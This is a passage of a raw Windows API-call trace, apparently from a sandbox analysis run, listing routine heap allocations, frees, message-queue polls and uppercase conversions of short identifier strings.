Size=0x10) returned 0x2aa9bb0 [0105.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0105.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0105.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0105.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0105.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0105.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0105.980] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0105.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0105.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0105.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0105.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0105.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0105.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0105.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0105.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0105.980] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0105.980] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0105.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0105.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0105.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0105.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0105.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0105.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0105.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0105.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0105.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0105.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0105.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0105.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0105.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0105.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0105.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0105.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0105.981] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0106.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0106.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0106.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0106.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0106.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0106.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0106.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0106.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0106.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0106.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0106.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0106.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0106.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0106.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0106.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0106.022] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0106.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0106.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0106.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0106.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0106.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0106.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0106.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0106.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0106.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0106.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0106.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0106.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0106.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0106.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0106.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0106.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0106.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0106.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0106.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0106.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0106.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0106.024] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0106.024] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0106.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0106.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0106.024] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0106.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0106.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0106.024] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0106.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0106.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0106.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0106.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0106.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0106.025] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0106.025] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0106.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0106.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0106.025] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0106.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0106.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0106.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74358 [0106.025] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0106.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0106.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0106.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0106.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0106.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0106.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0106.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0106.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0106.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0106.025] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0106.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0106.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0106.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0106.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0106.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0106.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0106.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0106.026] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0106.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0106.026] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0106.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0106.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0106.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0106.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0106.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0106.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0106.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0106.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0106.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0106.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0106.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0106.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74358 | out: hHeap=0x2af0000) returned 1 [0106.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0106.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0106.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0106.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0106.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0106.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0106.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0106.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0106.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0106.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0106.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0106.027] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0106.027] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0106.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0106.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0106.027] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0106.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0106.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0106.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73a10 [0106.027] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0106.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0106.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0106.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0106.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0106.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0106.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0106.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0106.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0106.027] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0106.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0106.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0106.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0106.028] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0106.028] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0106.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0106.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0106.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 